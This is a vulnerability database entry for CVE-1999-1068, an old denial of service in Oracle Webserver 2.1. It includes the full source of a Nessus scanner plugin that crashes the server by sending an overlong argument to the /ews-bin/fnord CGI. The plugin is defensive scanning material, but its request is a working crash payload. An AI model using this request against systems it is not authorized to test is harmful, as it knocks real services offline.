Vulnerabilities > CVE-1999-1068 - Unspecified vulnerability in Oracle Http Server 2.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
oracle
nessus

Summary

Oracle Webserver 2.1, when serving PL/SQL stored procedures, allows remote attackers to cause a denial of service via a long HTTP GET request.

Vulnerable Configurations

Part Description Count
Application
Oracle
1

Nessus

NASL familyDatabases
NASL idOWS_OVERFLOW.NASL
descriptionIt was possible to make the remote web server crash by supplying a too long argument to the cgi /ews-bin/fnord. An attacker may use this flaw to prevent your customers to access your website.
last seen2020-06-01
modified2020-06-02
plugin id10171
published1999-07-28
reporterThis script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/10171
titleOracle Webserver PL/SQL Stored Procedure GET Request DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(10171);
 script_version ("1.35");

 script_cve_id("CVE-1999-1068");

 script_name(english:"Oracle Webserver PL/SQL Stored Procedure GET Request DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote host has an application that is affected by denial
of service vulnerability." );
 script_set_attribute(attribute:"description", value:
"It was possible to make the remote web server crash by 
supplying a too long argument to the cgi /ews-bin/fnord. 
An attacker may use this flaw to prevent your customers 
to access your website." );
 script_set_attribute(attribute:"solution", value:
"Remove this CGI." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");

 script_set_attribute(attribute:"plugin_publication_date", value: "1999/07/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "1997/07/23");
 script_set_attribute(attribute:"plugin_type", value: "remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:http_server");
 script_cvs_date("Date: 2018/08/22 16:49:13");
 script_end_attributes();
 
 script_summary(english:"Crashes the remote OWS");
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
 script_family(english:"Databases");
 script_dependencie("http_version.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("Settings/ParanoidReport");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia < 2)
 exit(0, "This script is prone to FP and only runs in 'paranoid' mode");

port = get_http_port(default:80);

if (http_is_dead(port: port)) exit(1, "the web server on port "+port+" is dead");

res = is_cgi_installed3(item:"/ews-bin/fnord", port:port);
if(res)
{
  request = string("/ews-bin/fnord?foo=", crap(2048));
  is_cgi_installed3(item:request, port:port);
  sleep(5);
  if (http_is_dead(port: port, retry: 3)) security_warning(port);
}